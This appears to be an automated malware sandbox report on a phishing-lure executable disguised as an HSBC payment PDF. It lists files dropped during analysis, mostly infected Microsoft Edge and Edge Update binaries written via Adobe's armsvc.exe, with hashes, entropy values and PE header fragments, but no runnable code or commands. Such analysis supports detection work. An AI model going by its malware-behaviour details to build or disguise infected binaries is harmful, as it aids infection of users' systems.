                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1394176
                                                                                                                                                                              Entropy (8bit):4.671303731095913
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:qEyT6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xymLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:706EB52E44588A85A3CB806033C96603
                                                                                                                                                                              SHA1:BCB045B7A0F494E6610152249E4FAD721E96908A
                                                                                                                                                                              SHA-256:FCF72CEEC46C939DEA1B159E7CD84D486C605D2AE3DD7C48088958CD1CBF7AFC
                                                                                                                                                                              SHA-512:A0E3FD4A0850A42FE7642A5D0F403BC251E12ED040D082276155EE85A6319E1093EE9A5EEEA395E68A4F6E28270A12B2B7AE06D762DEE9CB2DB5A670F09094BD
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` .....]..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2354176
                                                                                                                                                                              Entropy (8bit):7.045012760202469
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:lhDdVrQ95RW0YQHyWQXE/09Val0GMLNiXicJFFRGNzj3:lhHYWmHyWKz7wRGpj3
                                                                                                                                                                              MD5:AB3EAE016DCC7F0026DB2D4EF2BCCB01
                                                                                                                                                                              SHA1:03BB4C262E82C6269F0CEAF20FF77E1090936E2F
                                                                                                                                                                              SHA-256:E67AB7CE13ED7B32DE499B6AD3D8E61F774CF5101D8F4BF10FF93CB1189257EA
                                                                                                                                                                              SHA-512:ED573C52C85F4AFD8CC32A71530CCA49829CCA657D3F9A8B0CDEEAD56C970CF4F5D841524DB43AF7BECF3A16E00D2D371FC40459A6B2709E91F0ABE762E2BB25
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......'$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1825280
                                                                                                                                                                              Entropy (8bit):7.152085736501312
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:a70E0ZCQZMib6Rrt9RoctGfmddB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:e0EzQS7RPRoc1VLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:D164B86D85E4FA61FD437AC49651FD45
                                                                                                                                                                              SHA1:A5E9885BE9AE0A5392FFE9A79527343B22F70C2C
                                                                                                                                                                              SHA-256:2A6520929D8C5C6ABC5CB9A0B01DC9479FD14F490C3728FD65F40040225D7378
                                                                                                                                                                              SHA-512:FE794DF290FC3F0DAACF3A96E2C130DAA501D87601CA0832D46222B753828649B0CCB3C3FEB2A7D55B63318CFF39D9D1D9C0757191A50677F5657F0BFD8E5045
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......v..... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1847808
                                                                                                                                                                              Entropy (8bit):7.139168248169895
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:yiD2VmA1YXiHwlklb8boUuWPg2gG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hD2VmAygwIb8boQxLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:71C98839DD7F0C3CD1F5393202F346CF
                                                                                                                                                                              SHA1:1F665BA446B1EC04C3786A6B89157280F98DC303
                                                                                                                                                                              SHA-256:D6A3DECA4DE7F5C86DBDD361F7BCCA6D3C8247472C67ECD0D7118B0E1B255B85
                                                                                                                                                                              SHA-512:7E0A83DCC72E5F4CF2CA3996D8DF151DFD90E6CB7B5D5FA815C2C06C7F37C11357556523EC30B0AE6266CE12752F2440FFB5FC5EBB2600F365CD670F8001643B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2853376
                                                                                                                                                                              Entropy (8bit):6.946956268922784
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:TfD3zO9ZhBGlohzM3HRNr00pLNiXicJFFRGNzj3:bDaalSzM00p7wRGpj3
                                                                                                                                                                              MD5:CA57BF46E41B70D65A4B54B512FBF39B
                                                                                                                                                                              SHA1:6B7898E54F8CC0AED4FEBB5C98EC1CB373AF2703
                                                                                                                                                                              SHA-256:54C5F738BA578FC2C844858D8FBDFC9676900FB95248A4FC8F9C947D21647E60
                                                                                                                                                                              SHA-512:387EAD02731A0E49B100B81969ECCF50CEFA74B02E891CC1E2C781D8E9345F8F5025215762D49B9023F30EF6C4201AF6AF4E74C9ABC603015F6BA283DD2E9B15
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-....../,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4320256
                                                                                                                                                                              Entropy (8bit):6.821900455106531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:2TaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhSLNiXicJy:pI72Lvkr4pbxJRoIMB7wRGpj3
                                                                                                                                                                              MD5:A0E20A93BF158E05662F34C2551E4763
                                                                                                                                                                              SHA1:2AD9770017D7ADF8C816F5E98FFDFFF2E82FD59A
                                                                                                                                                                              SHA-256:565BB6F9466B9DFDBC5381F67B05F7B6F6F138882A6928DF645E69A41127ACD8
                                                                                                                                                                              SHA-512:5B142A74DAD0A37BC50A64DEEC0D8A675FB1CC13363D550A15FC703B5937C173F7F9A45113BF88931BC88CE42787B178C359F542E9FC43A0BD89293A90FD6230
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....ibB... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2062336
                                                                                                                                                                              Entropy (8bit):7.091524759425025
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:YW9Jml9mmijxiMnF+ZxmQWcbLw8VR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YWnm5iAMkjmQWkVRLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:60263050E5D700898109EF995A52CE93
                                                                                                                                                                              SHA1:13BD17BE88DBED22AE831BBD41E2FD211C8BDB5C
                                                                                                                                                                              SHA-256:0B7DB0B039E687B756E630EF3575BDBC216AE2D07EDC099D8861DCB044FBD7D2
                                                                                                                                                                              SHA-512:9D12BE4ED967C7773EA6D3921F99CBD062F294EDD02B59D16BDFFA954B672F5C4B90C53DE295AECC7E7365EBACD21D19656F00683CC83A15578215B1BC43F39E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....TE ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                              Entropy (8bit):7.159884222737881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gwNHwoYhua6MZERO4qbBJTY6mY1uIgP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gwNPdNO7BJTfmEALNiXicJFFRGNzj3
                                                                                                                                                                              MD5:351954F4963BECECE28930FCBD0CA02C
                                                                                                                                                                              SHA1:BE2EABC642BC52FC46ABBE345CC5359DE0E8DE70
                                                                                                                                                                              SHA-256:CE9BC8F37C93B702EE7C4CF258713FA966A9A0D10F3DD6B4264BE6DE4762A704
                                                                                                                                                                              SHA-512:1672476FF23C31E7972AAE91E67E7D9A7D057D51B373B45BF76EBD5F1650EFA110DFCC126EF631CD654B128EFE4795DA9E824225E4D654F9A9426678E678EBB9
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1847808
                                                                                                                                                                              Entropy (8bit):7.139177585412219
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:CiD2VmA1YXiHwlklb8boUuWPg2gG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xD2VmAygwIb8boQxLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:12E1B8925E209DF0378A621F2CF30FFA
                                                                                                                                                                              SHA1:784ADCB8D6182118C7F469D524AF7B0254A5C7C9
                                                                                                                                                                              SHA-256:3679E95FB051CC75D715AEDD2966E24D22E6BC70B757953700E68351A4111ED5
                                                                                                                                                                              SHA-512:278F1B56668B234E380BC366F52D932679A023D743D45E630932BF4D8600FAC0A316F7B27B81ABD150389182F19E05691AFA09EDD656A8A3BE36F44F535CCC4F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......~..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                              Entropy (8bit):7.159885295427225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:kwNHwoYhua6MZERO4qbBJTY6mY1uIgP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kwNPdNO7BJTfmEALNiXicJFFRGNzj3
                                                                                                                                                                              MD5:C1B7D01BB02CA67F77E6850117EFAB09
                                                                                                                                                                              SHA1:988540A110083C33DD5279AFA03F1E0ED847332C
                                                                                                                                                                              SHA-256:0649F20304632DFA79786A3801833F31F03FBE00888B62A03609F713261F900B
                                                                                                                                                                              SHA-512:24532197C7FB7037FD0B518556D7F22D3C25F7B0977A0373F8AB617E7DF50679434A876850AD471E64704171AA94B8A34C1EDBCBF426051965E208ABC6FA0811
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1481216
                                                                                                                                                                              Entropy (8bit):4.694141404006032
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Q6lbht6BHs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7lNtqHsLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:38C9C3DED5D00754BD8B6E6E5B10B387
                                                                                                                                                                              SHA1:440B8DD10C9D8D86976C01C7890A5F6925949EEE
                                                                                                                                                                              SHA-256:4C7090739751E205F67873FD8F17DBA6131F3CACD33FCB63ED159234A17F2E6D
                                                                                                                                                                              SHA-512:FEC35FA51D3232A918F7040F053827318CF6BBD0E6573B602660913CC88DAB047668514882CC40A2E42045AC40923AA600CF69B81EB0165C8E53E32CD022B85D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1376768
                                                                                                                                                                              Entropy (8bit):4.656856773394686
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:5IxkTBVA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Wxk1VALNiXicJFFRGNzj3
                                                                                                                                                                              MD5:D7FED8AC02DF0307866F999C695E5655
                                                                                                                                                                              SHA1:681DD52924ADE263A9490745C53C11FFA3EFEC9D
                                                                                                                                                                              SHA-256:33912BDAD09643625D7DA704CF9FFD047734899A2188AF66A5B971A6D8CB1723
                                                                                                                                                                              SHA-512:094FA02BE2B4C64003300F5DBFD0054A1AAEEE934152F4FCB4868614121DE910348CC957CEB6AA98BA5937D95C8BD3DB7B121C1197ADA171FAA2D91F77907E51
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .............................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1490944
                                                                                                                                                                              Entropy (8bit):4.787382961566884
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Xcssmrd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:MbuLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:0C2828866DFD7330E15AB1049881076D
                                                                                                                                                                              SHA1:41691ED2773EDF49CC5572DD1C0B727DC8D4B5BF
                                                                                                                                                                              SHA-256:8F16700BD406F98D94EDAEFC0B5DB84F20D099E38199892BA644945B0226D905
                                                                                                                                                                              SHA-512:712B32C6DCBED55AC84B6000F0D05B4DA8B485B205E8E5F1BCB49838C79ACB476DC15B51D620450CBFF7D91A44C69662F869C29E98A125E25B7186C05CC48AD2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!.....]%.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1539584
                                                                                                                                                                              Entropy (8bit):4.8965643001547
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:KTfcT++foSBWU2Yxhkgy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qfcK+foQWU2YnPyLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5EFD3B9B3E1D483A0CE3855B570D4143
                                                                                                                                                                              SHA1:1A4F3C02C6C6334AA81187FB204C04E83447F297
                                                                                                                                                                              SHA-256:65C8BE0CA21A77699CF8291B1DC2D123D8113485F9D9E3C1D468BE01386264CD
                                                                                                                                                                              SHA-512:2536F063CDD5987CF4BFF29175214012A91DCEB1DFEF54BE062A2C1B6AA987CE6BF7A466EB9D0CCB2623BB7D8F1746AA3B3D58D7DC1BA098E3A36D91E258CE83
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................".....b;.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1376768
                                                                                                                                                                              Entropy (8bit):4.656903388673929
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:hbBRzBgS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VBRVgSLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2969B3A2AF3B2AFBC0617C3674BC8BDA
                                                                                                                                                                              SHA1:45874B5B5D2D599187CCB9A725BA4B11B6E27A8F
                                                                                                                                                                              SHA-256:135D1D3FC250D8C064567A5B33E98E5A8600D91D53B78636E152052ABFDBD2C5
                                                                                                                                                                              SHA-512:00F48021EB5019E38066CF74224DBE7743D3BA6EB22EE4E7C5864FC94D16CB0AACFE0DCC71BF17CA0552653A1A8E8695711F9382AC3BCB30F347C5DB825DDAE4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@........................... .....n...........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2168832
                                                                                                                                                                              Entropy (8bit):7.93763841289764
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:qy53w24gQu3TPZ2psFkiSqwozYLNiXicJFFRGNzj3:qyFQgZqsFki+ozY7wRGpj3
                                                                                                                                                                              MD5:6B49DE9E8F5864E490498A91204B87CE
                                                                                                                                                                              SHA1:6E1595444FF0955C5D415CA0BAA511DB4D5D0D5D
                                                                                                                                                                              SHA-256:E0089EAA039D645ADF62181437D9492D0BBAE6D70518736274A7EEBE6E40E9FD
                                                                                                                                                                              SHA-512:552B6F088EFFDEEC4796478BEFB22AB58CF3E6535BF9A887A718B30787B095F3CF4A8DA34188AC9EBB6F63EC2BFFB208B50D825C464EFE5FB7851789C3FBD3B3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3141
                                                                                                                                                                              Entropy (8bit):4.850973511586367
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:Ftk5yVQ+aGR73/R3mqZ1DYTSc3YvHsx3L3Q+ai3qfCT+F+Y3N3n3M3D:MiPT0Eo
                                                                                                                                                                              MD5:99B30E1686AA32F919388B41997F5283
                                                                                                                                                                              SHA1:360B79445D56BDACB9A45657860E155A616307BC
                                                                                                                                                                              SHA-256:50B1564D7F65FC29E34A2154A3B12646CA6562B50B13E08E1B4F22C89848B008
                                                                                                                                                                              SHA-512:E0F3E97CBC4F4F5412CCF1DD2F575C9C5851732D534E1AD18E5D123A25EE77931869648B4EF2DB6C1BF70A536561499389ABAC313B9E7B4D55666BA1B4146238
